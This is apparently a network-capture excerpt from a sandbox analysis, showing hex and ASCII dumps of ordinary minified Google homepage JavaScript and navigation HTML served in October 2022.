                                                                                                            2022-10-03 15:29:37 UTC71INData Raw: 3b 62 2e 6f 6e 65 72 72 6f 72 3d 62 2e 6f 6e 6c 6f 61 64 3d 62 2e 6f 6e 61 62 6f 72 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 64 65 6c 65 74 65 20 69 61 5b 63 5d 7d 63 61 74 63 68 28 64 29 7b 7d 7d 3b 69 61 5b 63 5d 3d 62 3b 62 2e 73 72 63 3d 61 3b 68 61 3d 63 2b 31 7d 2c 69 61 3d 5b 5d 2c 68 61 3d 30 3b 70 28 22 6c 6f 67 67 65 72 22 2c 7b 69 6c 3a 75 2c 6d 6c 3a 74 2c 6c 6f 67 3a 6a 61 7d 29 3b 76 61 72 20 76 3d 77 69 6e 64 6f 77 2e 67 62 61 72 2e 6c 6f 67 67 65 72 3b 76 61 72 20 77 3d 7b 7d 2c 6b 61 3d 7b 7d 2c 78 3d 5b 5d 2c 6c 61 3d 68 2e 62 28 22 30 2e 31 22 2c 2e 31 29 2c 6d 61 3d 68 2e 61 28 22 31 22 2c 21 30 29 2c 6e 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 78 2e 70 75 73 68 28 5b 61 2c 62 5d 29 7d 2c 6f 61 3d 66 75 6e 63 74 69 6f
                                                                                                            Data Ascii: ;b.onerror=b.onload=b.onabort=function(){try{delete ia[c]}catch(d){}};ia[c]=b;b.src=a;ha=c+1},ia=[],ha=0;p("logger",{il:u,ml:t,log:ja});var v=window.gbar.logger;var w={},ka={},x=[],la=h.b("0.1",.1),ma=h.a("1",!0),na=function(a,b){x.push([a,b])},oa=functio
                                                                                                            2022-10-03 15:29:37 UTC71INData Raw: 64 65 0d 0a 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 63 2e 73 72 63 3d 61 3b 63 2e 61 73 79 6e 63 3d 6d 61 3b 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 3c 6c 61 26 26 28 63 2e 6f 6e 65 72 72 6f 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 6f 6e 65 72 72 6f 72 3d 6e 75 6c 6c 3b 74 28 45 72 72 6f 72 28 22 42 75 6e 64 6c 65 20 6c 6f 61 64 20 66 61 69 6c 65 64 3a 20 6e 61 6d 65 3d 22 2b 28 62 7c 7c 22 55 4e 4b 22 29 2b 22 20 75 72 6c 3d 22 2b 61 29 29 7d 29 3b 28 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 6a 73 63 22 29 7c 7c 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 0d 0a
                                                                                                            Data Ascii: dereateElement("script");c.src=a;c.async=ma;Math.random()<la&&(c.onerror=function(){c.onerror=null;t(Error("Bundle load failed: name="+(b||"UNK")+" url="+a))});(document.getElementById("xjsc")||document.getElementsByTagName(
                                                                                                            2022-10-03 15:29:37 UTC72INData Raw: 36 61 65 34 0d 0a 22 62 6f 64 79 22 29 5b 30 5d 7c 7c 0a 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 68 65 61 64 22 29 5b 30 5d 29 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 63 29 7d 2c 73 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 66 6f 72 28 76 61 72 20 62 2c 63 3d 30 3b 28 62 3d 78 5b 63 5d 29 26 26 62 5b 30 5d 21 3d 61 3b 2b 2b 63 29 3b 21 62 7c 7c 62 5b 31 5d 2e 6c 7c 7c 62 5b 31 5d 2e 73 7c 7c 28 62 5b 31 5d 2e 73 3d 21 30 2c 72 61 28 32 2c 61 29 2c 62 5b 31 5d 2e 75 72 6c 26 26 71 61 28 62 5b 31 5d 2e 75 72 6c 2c 61 29 2c 62 5b 31 5d 2e 6c 69 62 73 26 26 44 26 26 44 28 62 5b 31 5d 2e 6c 69 62 73 29 29 7d 2c 74 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 42 28 22 67 63 22 2c 61 29 7d 2c 75 61 3d 6e 75 6c 6c
                                                                                                            Data Ascii: 6ae4"body")[0]||document.getElementsByTagName("head")[0]).appendChild(c)},sa=function(a){for(var b,c=0;(b=x[c])&&b[0]!=a;++c);!b||b[1].l||b[1].s||(b[1].s=!0,ra(2,a),b[1].url&&qa(b[1].url,a),b[1].libs&&D&&D(b[1].libs))},ta=function(a){B("gc",a)},ua=null
                                                                                                            2022-10-03 15:29:37 UTC73INData Raw: 69 73 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 29 3b 47 2e 6d 3d 45 28 47 2e 6d 2c 22 22 29 3b 47 2e 6c 3d 45 28 47 2e 6c 2c 5b 5d 29 3b 47 2e 64 70 6f 3d 45 28 47 2e 64 70 6f 2c 22 22 29 3b 78 61 7c 7c 78 2e 70 75 73 68 28 5b 22 67 6c 22 2c 7b 75 72 6c 3a 22 2f 2f 73 73 6c 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 67 62 2f 6a 73 2f 61 62 63 2f 67 6c 6d 5f 65 37 62 62 33 39 61 37 65 31 61 32 34 35 38 31 66 66 34 66 38 64 31 39 39 36 37 38 62 31 62 39 2e 6a 73 22 7d 5d 29 3b 76 61 72 20 45 61 3d 7b 70 75 3a 79 61 2c 73 68 3a 22 22 2c 73 69 3a 7a 61 2c 68 6c 3a 22 65 6e 22 7d 3b 77 2e 67 6c 3d 45 61 3b 77 61 3f 41 61 2e 6c 6f 61 64 7c 7c 70 28 22 6c 6f 61 64 22 2c 42 61 2c 41 61 29 3a 70 28 22 6c 6f 61 64 22 2c 42 61 2c 41 61 29 3b 70 28 22 64 67 6c 22 2c 42 61 29
                                                                                                            Data Ascii: is.google.com");G.m=E(G.m,"");G.l=E(G.l,[]);G.dpo=E(G.dpo,"");xa||x.push(["gl",{url:"//ssl.gstatic.com/gb/js/abc/glm_e7bb39a7e1a24581ff4f8d199678b1b9.js"}]);var Ea={pu:ya,sh:"",si:za,hl:"en"};w.gl=Ea;wa?Aa.load||p("load",Ba,Aa):p("load",Ba,Aa);p("dgl",Ba)
                                                                                                            2022-10-03 15:29:37 UTC74INData Raw: 6c 61 73 73 4e 61 6d 65 2b 3d 28 22 22 21 3d 63 3f 22 20 22 3a 22 22 29 2b 62 29 7d 2c 4a 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 3d 61 2e 63 6c 61 73 73 4e 61 6d 65 3b 62 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 73 3f 5c 5c 62 22 2b 62 2b 22 5c 5c 62 22 29 3b 63 26 26 63 2e 6d 61 74 63 68 28 62 29 26 26 28 61 2e 63 6c 61 73 73 4e 61 6d 65 3d 63 2e 72 65 70 6c 61 63 65 28 62 2c 22 22 29 29 7d 2c 48 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 62 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 62 22 2b 62 2b 22 5c 5c 62 22 29 3b 61 3d 61 2e 63 6c 61 73 73 4e 61 6d 65 3b 72 65 74 75 72 6e 21 28 21 61 7c 7c 21 61 2e 6d 61 74 63 68 28 62 29 29 7d 2c 4d 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 48 28 61 2c 62 29 3f 4a 28 61 2c 62 29
                                                                                                            Data Ascii: lassName+=(""!=c?" ":"")+b)},J=function(a,b){var c=a.className;b=new RegExp("\\s?\\b"+b+"\\b");c&&c.match(b)&&(a.className=c.replace(b,""))},H=function(a,b){b=new RegExp("\\b"+b+"\\b");a=a.className;return!(!a||!a.match(b))},Ma=function(a,b){H(a,b)?J(a,b)
                                                                                                            2022-10-03 15:29:37 UTC75INData Raw: 76 61 72 20 61 3d 56 61 28 29 3b 72 65 74 75 72 6e 20 30 3c 61 2e 6c 65 6e 67 74 68 3f 61 5b 30 5d 3a 6e 75 6c 6c 7d 2c 58 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 67 62 5f 37 30 22 29 7d 2c 4b 3d 7b 7d 2c 4c 3d 7b 7d 2c 59 61 3d 7b 7d 2c 4d 3d 7b 7d 2c 4e 3d 76 6f 69 64 20 30 2c 63 62 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 74 72 79 7b 76 61 72 20 63 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 67 62 22 29 3b 49 28 63 2c 22 67 62 70 64 6a 73 22 29 3b 4f 28 29 3b 5a 61 28 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 67 62 22 29 29 26 26 49 28 63 2c 22 67 62 72 74 6c 22 29 3b 69 66 28 62 26 26 62
                                                                                                            Data Ascii: var a=Va();return 0<a.length?a[0]:null},Xa=function(){return document.getElementById("gb_70")},K={},L={},Ya={},M={},N=void 0,cb=function(a,b){try{var c=document.getElementById("gb");I(c,"gbpdjs");O();Za(document.getElementById("gb"))&&I(c,"gbrtl");if(b&&b
                                                                                                            2022-10-03 15:29:37 UTC77INData Raw: 64 65 73 2e 6c 65 6e 67 74 68 3b 66 3d 21 31 3b 66 6f 72 28 76 61 72 20 6d 3d 2d 31 2c 71 2c 53 3d 30 3b 71 3d 63 5b 53 5d 3b 53 2b 2b 29 7b 66 6f 72 28 76 61 72 20 46 3d 76 6f 69 64 20 30 2c 54 3d 30 3b 46 3d 71 5b 54 5d 3b 54 2b 2b 29 7b 66 6f 72 28 3b 64 3c 6e 26 26 48 28 6b 2e 63 68 69 6c 64 4e 6f 64 65 73 5b 64 5d 2c 46 29 3b 29 64 2b 2b 3b 69 66 28 46 3d 3d 62 29 7b 6b 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 6c 2c 6b 2e 63 68 69 6c 64 4e 6f 64 65 73 5b 64 5d 7c 7c 0a 6e 75 6c 6c 29 3b 66 3d 21 30 3b 62 72 65 61 6b 7d 7d 69 66 28 66 29 7b 69 66 28 64 2b 31 3c 6b 2e 63 68 69 6c 64 4e 6f 64 65 73 2e 6c 65 6e 67 74 68 29 7b 76 61 72 20 55 3d 6b 2e 63 68 69 6c 64 4e 6f 64 65 73 5b 64 2b 31 5d 3b 48 28 55 2e 66 69 72 73 74 43 68 69 6c 64 2c 22 67 62 6d
                                                                                                            Data Ascii: des.length;f=!1;for(var m=-1,q,S=0;q=c[S];S++){for(var F=void 0,T=0;F=q[T];T++){for(;d<n&&H(k.childNodes[d],F);)d++;if(F==b){k.insertBefore(l,k.childNodes[d]||null);f=!0;break}}if(f){if(d+1<k.childNodes.length){var U=k.childNodes[d+1];H(U.firstChild,"gbm
                                                                                                            2022-10-03 15:29:37 UTC78INData Raw: 70 3b 22 29 3b 50 28 61 2c 21 30 29 3b 62 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 62 3f 62 3a 31 45 34 3b 76 61 72 20 63 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 73 62 28 61 29 7d 3b 71 62 3d 77 69 6e 64 6f 77 2e 73 65 74 54 69 6d 65 6f 75 74 28 63 2c 62 29 7d 7d 2c 74 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 4f 28 29 3b 61 26 26 28 50 28 61 2c 21 31 29 2c 72 62 28 61 2c 22 22 29 29 7d 2c 73 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 72 79 7b 4f 28 29 3b 76 61 72 20 62 3d 61 7c 7c 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 4e 29 3b 62 26 26 28 72 62 28 62 2c 22 54 68 69 73 20 73 65 72 76 69 63 65 20 69 73 20 63 75 72 72 65 6e 74 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 25 31 24 73 50 6c 65 61 73 65 20
                                                                                                            Data Ascii: p;");P(a,!0);b="undefined"!=typeof b?b:1E4;var c=function(){sb(a)};qb=window.setTimeout(c,b)}},tb=function(a){O();a&&(P(a,!1),rb(a,""))},sb=function(a){try{O();var b=a||document.getElementById(N);b&&(rb(b,"This service is currently unavailable.%1$sPlease
                                                                                                            2022-10-03 15:29:37 UTC79INData Raw: 62 22 2c 52 61 29 3b 70 28 22 70 63 22 2c 53 61 29 3b 70 28 22 62 73 79 22 2c 76 62 29 3b 68 2e 64 3d 62 62 3b 68 2e 6a 3d 75 62 3b 76 61 72 20 78 62 3d 7b 7d 3b 77 2e 62 61 73 65 3d 78 62 3b 78 2e 70 75 73 68 28 5b 22 6d 22 2c 7b 75 72 6c 3a 22 2f 2f 73 73 6c 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 67 62 2f 6a 73 2f 73 65 6d 5f 38 64 32 38 37 36 38 34 63 38 37 39 31 34 36 35 63 62 34 62 65 61 62 39 36 65 63 63 33 36 64 36 2e 6a 73 22 7d 5d 29 3b 67 2e 73 67 3d 7b 63 3a 22 31 22 7d 3b 70 28 22 77 67 22 2c 7b 72 67 3a 7b 7d 7d 29 3b 76 61 72 20 79 62 3d 7b 74 69 77 3a 68 2e 63 28 22 31 35 30 30 30 22 2c 30 29 2c 74 69 65 3a 68 2e 63 28 22 33 30 30 30 30 22 2c 30 29 7d 3b 77 2e 77 67 3d 79 62 3b 76 61 72 20 7a 62 3d 7b 74 68 69 3a 68 2e 63 28 22 31 30 30 30
                                                                                                            Data Ascii: b",Ra);p("pc",Sa);p("bsy",vb);h.d=bb;h.j=ub;var xb={};w.base=xb;x.push(["m",{url:"//ssl.gstatic.com/gb/js/sem_8d287684c8791465cb4beab96ecc36d6.js"}]);g.sg={c:"1"};p("wg",{rg:{}});var yb={tiw:h.c("15000",0),tie:h.c("30000",0)};w.wg=yb;var zb={thi:h.c("1000
                                                                                                            2022-10-03 15:29:37 UTC80INData Raw: 3d 22 26 6f 67 67 76 3d 22 2b 64 28 22 65 73 5f 70 6c 75 73 6f 6e 65 5f 67 63 5f 32 30 32 32 30 38 30 31 2e 30 5f 70 30 22 29 2c 54 3d 64 28 22 63 6f 6d 22 29 2c 55 3d 64 28 22 65 6e 22 29 2c 56 3d 0a 64 28 22 47 42 52 22 29 3b 76 61 72 20 79 3d 30 3b 68 2e 61 28 22 22 29 26 26 28 79 7c 3d 31 29 3b 68 2e 61 28 22 22 29 26 26 28 79 7c 3d 32 29 3b 68 2e 61 28 22 22 29 26 26 28 79 7c 3d 34 29 3b 61 3d 5b 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 67 65 6e 5f 32 30 34 3f 61 74 79 70 3d 69 26 7a 78 3d 22 2c 66 2c 22 26 6f 67 65 3d 22 2c 61 2c 22 26 6f 67 65 78 3d 22 2c 6b 2c 22 26 6f 67 65 76 3d 22 2c 6c 2c 22 26 6f 67 66 3d 22 2c 6d 2c 22 26 6f 67 70 3d 22 2c 71 2c 22 26 6f 67 72 70 3d 22 2c 6e 2c 22 26 6f 67 73 72 3d 22 2c 63 2c 22 26 6f 67 76 3d
                                                                                                            Data Ascii: ="&oggv="+d("es_plusone_gc_20220801.0_p0"),T=d("com"),U=d("en"),V=d("GBR");var y=0;h.a("")&&(y|=1);h.a("")&&(y|=2);h.a("")&&(y|=4);a=["//www.google.com/gen_204?atyp=i&zx=",f,"&oge=",a,"&ogex=",k,"&ogev=",l,"&ogf=",m,"&ogp=",q,"&ogrp=",n,"&ogsr=",c,"&ogv=
                                                                                                            2022-10-03 15:29:37 UTC81INData Raw: 3b 70 28 22 73 70 64 22 2c 55 62 29 3b 70 28 22 70 61 61 22 2c 4e 62 29 3b 70 28 22 70 72 6d 22 2c 4f 62 29 3b 6d 62 28 22 67 62 64 34 22 2c 4f 62 29 3b 0a 69 66 28 68 2e 61 28 22 22 29 29 7b 76 61 72 20 56 62 3d 7b 64 3a 68 2e 61 28 22 22 29 2c 65 3a 22 22 2c 73 61 6e 77 3a 68 2e 61 28 22 22 29 2c 70 3a 22 68 74 74 70 73 3a 2f 2f 6c 68 33 2e 67 6f 6f 67 6c 65 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 6f 67 77 2f 64 65 66 61 75 6c 74 2d 75 73 65 72 3d 73 39 36 22 2c 63 70 3a 22 31 22 2c 78 70 3a 68 2e 61 28 22 31 22 29 2c 6d 67 3a 22 25 31 24 73 20 28 64 65 6c 65 67 61 74 65 64 29 22 2c 6d 64 3a 22 25 31 24 73 20 28 64 65 66 61 75 6c 74 29 22 2c 6d 68 3a 22 32 32 30 22 2c 73 3a 22 31 22 2c 70 70 3a 54 62 2c 70 70 6c 3a 68 2e 61 28 22 22 29 2c 70 70
                                                                                                            Data Ascii: ;p("spd",Ub);p("paa",Nb);p("prm",Ob);mb("gbd4",Ob);if(h.a("")){var Vb={d:h.a(""),e:"",sanw:h.a(""),p:"https://lh3.googleusercontent.com/ogw/default-user=s96",cp:"1",xp:h.a("1"),mg:"%1$s (delegated)",md:"%1$s (default)",mh:"220",s:"1",pp:Tb,ppl:h.a(""),pp
                                                                                                            2022-10-03 15:29:37 UTC83INData Raw: 69 65 2e 6d 61 74 63 68 28 22 50 52 45 46 22 29 7d 63 61 74 63 68 28 63 29 7b 7d 72 65 74 75 72 6e 21 62 7d 2c 65 63 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 72 65 74 75 72 6e 21 21 65 2e 6c 6f 63 61 6c 53 74 6f 72 61 67 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 2e 6c 6f 63 61 6c 53 74 6f 72 61 67 65 7d 63 61 74 63 68 28 61 29 7b 72 65 74 75 72 6e 21 31 7d 7d 2c 66 63 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 26 26 61 2e 73 74 79 6c 65 26 26 61 2e 73 74 79 6c 65 2e 62 65 68 61 76 69 6f 72 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 61 2e 6c 6f 61 64 7d 2c 67 63 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 29 7b 74 72 79 7b 64 63 28 64 6f 63 75 6d 65 6e 74 29 7c 7c 28 64 7c 7c 28
                                                                                                            Data Ascii: ie.match("PREF")}catch(c){}return!b},ec=function(){try{return!!e.localStorage&&"object"==typeof e.localStorage}catch(a){return!1}},fc=function(a){return a&&a.style&&a.style.behavior&&"undefined"!=typeof a.load},gc=function(a,b,c,d){try{dc(document)||(d||(
                                                                                                            2022-10-03 15:29:37 UTC84INData Raw: 68 69 73 2c 64 29 7d 29 7d 7d 3b 5a 28 67 2e 75 70 2c 22 73 6c 22 29 3b 5a 28 67 2e 75 70 2c 22 73 69 22 29 3b 5a 28 67 2e 75 70 2c 22 73 70 6c 22 29 3b 5a 28 67 2e 75 70 2c 22 64 70 63 22 29 3b 5a 28 67 2e 75 70 2c 22 69 69 63 22 29 3b 67 2e 6d 63 66 28 22 75 70 22 2c 7b 73 70 3a 68 2e 62 28 22 30 2e 30 31 22 2c 31 29 2c 74 6c 64 3a 22 63 6f 2e 75 6b 22 2c 70 72 69 64 3a 22 31 22 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 6c 63 28 29 7b 66 75 6e 63 74 69 6f 6e 20 61 28 29 7b 66 6f 72 28 76 61 72 20 6d 3b 28 6d 3d 6b 5b 6c 2b 2b 5d 29 26 26 22 6d 22 21 3d 6d 5b 30 5d 26 26 21 6d 5b 31 5d 2e 61 75 74 6f 3b 29 3b 6d 26 26 28 72 61 28 32 2c 6d 5b 30 5d 29 2c 6d 5b 31 5d 2e 75 72 6c 26 26 71 61 28 6d 5b 31 5d 2e 75 72 6c 2c 6d 5b 30 5d 29 2c 6d 5b 31 5d 2e 6c 69 62
                                                                                                            Data Ascii: his,d)})}};Z(g.up,"sl");Z(g.up,"si");Z(g.up,"spl");Z(g.up,"dpc");Z(g.up,"iic");g.mcf("up",{sp:h.b("0.01",1),tld:"co.uk",prid:"1"});function lc(){function a(){for(var m;(m=k[l++])&&"m"!=m[0]&&!m[1].auto;);m&&(ra(2,m[0]),m[1].url&&qa(m[1].url,m[0]),m[1].lib
                                                                                                            2022-10-03 15:29:37 UTC85INData Raw: 62 61 72 3b 61 2e 6d 63 66 28 22 6d 6d 22 2c 7b 73 3a 22 31 22 7d 29 3b 7d 63 61 74 63 68 28 65 29 7b 77 69 6e 64 6f 77 2e 67 62 61 72 26 26 67 62 61 72 2e 6c 6f 67 67 65 72 26 26 67 62 61 72 2e 6c 6f 67 67 65 72 2e 6d 6c 28 65 2c 7b 22 5f 73 6e 22 3a 22 63 66 67 2e 69 6e 69 74 22 7d 29 3b 7d 7d 29 28 29 3b 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 2f 2a 0a 0a 20 43 6f 70 79 72 69 67 68 74 20 54 68 65 20 43 6c 6f 73 75 72 65 20 4c 69 62 72 61 72 79 20 41 75 74 68 6f 72 73 2e 0a 20 53 50 44 58 2d 4c 69 63 65 6e 73 65 2d 49 64 65 6e 74 69 66 69 65 72 3a 20 41 70 61 63 68 65 2d 32 2e 30 0a 2a 2f 0a 76 61 72 20 64 3d 77 69 6e 64 6f 77 2e 67 62 61 72 2e 69 2e 69 3b 76 61 72 20 65 3d 77 69 6e 64 6f 77 2e 67 62 61 72 3b 76 61 72 20 66 3d 65 2e 69 3b 76
                                                                                                            Data Ascii: bar;a.mcf("mm",{s:"1"});}catch(e){window.gbar&&gbar.logger&&gbar.logger.ml(e,{"_sn":"cfg.init"});}})();(function(){try{/* Copyright The Closure Library Authors. SPDX-License-Identifier: Apache-2.0*/var d=window.gbar.i.i;var e=window.gbar;var f=e.i;v
                                                                                                            2022-10-03 15:29:37 UTC86INData Raw: 68 73 74 61 72 74 22 2c 22 74 6f 75 63 68 6d 6f 76 65 22 2c 22 77 68 65 65 6c 22 2c 22 6b 65 79 64 6f 77 6e 22 5d 2c 67 62 6c 3a 22 65 73 5f 70 6c 75 73 6f 6e 65 5f 67 63 5f 32 30 32 32 30 38 30 31 2e 30 5f 70 30 22 2c 68 64 3a 22 63 6f 6d 22 2c 68 6c 3a 22 65 6e 22 2c 69 72 70 3a 64 28 22 22 29 2c 70 69 64 3a 65 28 22 31 22 29 2c 0a 73 6e 69 64 3a 65 28 22 32 38 38 33 34 22 29 2c 74 6f 3a 65 28 22 33 30 30 30 30 30 22 29 2c 75 3a 65 28 22 22 29 2c 76 66 3a 22 2e 36 36 2e 22 7d 2c 67 3d 66 2c 68 3d 5b 22 62 6e 64 63 66 67 22 5d 2c 6b 3d 61 3b 68 5b 30 5d 69 6e 20 6b 7c 7c 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 6b 2e 65 78 65 63 53 63 72 69 70 74 7c 7c 6b 2e 65 78 65 63 53 63 72 69 70 74 28 22 76 61 72 20 22 2b 68 5b 30 5d 29 3b 66 6f
                                                                                                            Data Ascii: hstart","touchmove","wheel","keydown"],gbl:"es_plusone_gc_20220801.0_p0",hd:"com",hl:"en",irp:d(""),pid:e("1"),snid:e("28834"),to:e("300000"),u:e(""),vf:".66."},g=f,h=["bndcfg"],k=a;h[0]in k||"undefined"==typeof k.execScript||k.execScript("var "+h[0]);fo
                                                                                                            2022-10-03 15:29:37 UTC88INData Raw: 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 67 62 74 62 32 3e 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 67 62 74 73 3e 53 65 61 72 63 68 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 67 62 74 3e 3c 61 20 63 6c 61 73 73 3d 67 62 7a 74 20 69 64 3d 67 62 5f 32 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 2e 75 6b 2f 69 6d 67 68 70 3f 68 6c 3d 65 6e 26 74 61 62 3d 77 69 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 67 62 74 62 32 3e 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 67 62 74 73 3e 49 6d 61 67 65 73 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 67 62 74 3e 3c 61 20 63 6c 61 73 73 3d 67 62 7a 74 20 69 64 3d 67 62 5f 38 20 68 72 65
                                                                                                            Data Ascii: ><span class=gbtb2></span><span class=gbts>Search</span></a></li><li class=gbt><a class=gbzt id=gb_2 href="https://www.google.co.uk/imghp?hl=en&tab=wi"><span class=gbtb2></span><span class=gbts>Images</span></a></li><li class=gbt><a class=gbzt id=gb_8 hre
                                                                                                            2022-10-03 15:29:37 UTC89INData Raw: 3d 22 67 62 74 73 20 67 62 74 73 61 22 3e 3c 73 70 61 6e 20 69 64 3d 67 62 7a 74 6d 73 31 3e 4d 6f 72 65 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 67 62 6d 61 3e 3c 2f 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 27 58 5f 6e 4e 64 52 78 67 6f 57 68 50 69 33 6b 70 5f 50 41 70 38 41 27 3e 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 67 62 7a 74 6d 27 29 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 63 6c 69 63 6b 27 2c 20 66 75 6e 63 74 69 6f 6e 20 63 6c 69 63 6b 48 61 6e 64 6c 65 72 28 29 20 7b 20 67 62 61 72 2e 74 67 28 65 76 65 6e 74 2c 74 68 69 73 29 3b 20 7d 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 64 69 76 20 63 6c 61 73 73 3d 67 62 6d 20 69 64 3d 67 62 64
                                                                                                            Data Ascii: ="gbts gbtsa"><span id=gbztms1>More</span><span class=gbma></span></span></a><script nonce='X_nNdRxgoWhPi3kp_PAp8A'>document.getElementById('gbztm').addEventListener('click', function clickHandler() { gbar.tg(event,this); });</script><div class=gbm id=gbd
                                                                                                            2022-10-03 15:29:37 UTC90INData Raw: 64 6f 63 75 6d 65 6e 74 2f 3f 75 73 70 3d 64 6f 63 73 5f 61 6c 63 22 3e 44 6f 63 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 67 62 6d 74 63 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 62 6d 74 20 67 62 6d 68 22 3e 3c 2f 64 69 76 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 67 62 6d 74 63 3e 3c 61 20 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 2e 75 6b 2f 69 6e 74 6c 2f 65 6e 2f 61 62 6f 75 74 2f 70 72 6f 64 75 63 74 73 3f 74 61 62 3d 77 68 22 20 63 6c 61 73 73 3d 67 62 6d 74 3e 45 76 65 6e 20 6d 6f 72 65 20 26 72 61 71 75 6f 3b 3c 2f 61 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 27 58 5f 6e 4e 64 52 78 67 6f 57 68 50 69 33 6b 70 5f 50 41 70 38 41 27 3e 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53
                                                                                                            Data Ascii: document/?usp=docs_alc">Docs</a></li><li class=gbmtc><div class="gbmt gbmh"></div></li><li class=gbmtc><a href="https://www.google.co.uk/intl/en/about/products?tab=wh" class=gbmt>Even more &raquo;</a><script nonce='X_nNdRxgoWhPi3kp_PAp8A'>document.queryS
                                                                                                            2022-10-03 15:29:37 UTC91INData Raw: 69 70 74 3e 3c 64 69 76 20 63 6c 61 73 73 3d 67 62 6d 20 69 64 3d 67 62 64 35 20 61 72 69 61 2d 6f 77 6e 65 72 3d 67 62 67 35 3e 3c 64 69 76 20 63 6c 61 73 73 3d 67 62 6d 63 3e 3c 6f 6c 20 69 64 3d 67 62 6f 6d 20 63 6c 61 73 73 3d 67 62 6d 63 63 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 67 62 6b 63 20 67 62 6d 74 63 22 3e 3c 61 20 20 63 6c 61 73 73 3d 67 62 6d 74 20 68 72 65 66 3d 22 2f 70 72 65 66 65 72 65 6e 63 65 73 3f 68 6c 3d 65 6e 22 3e 53 65 61 72 63 68 20 73 65 74 74 69 6e 67 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 67 62 6d 74 63 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 62 6d 74 20 67 62 6d 68 22 3e 3c 2f 64 69 76 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 67 62 6b 70 20 67 62 6d 74 63 22 3e 3c 61 20 63 6c 61 73 73 3d 67 62
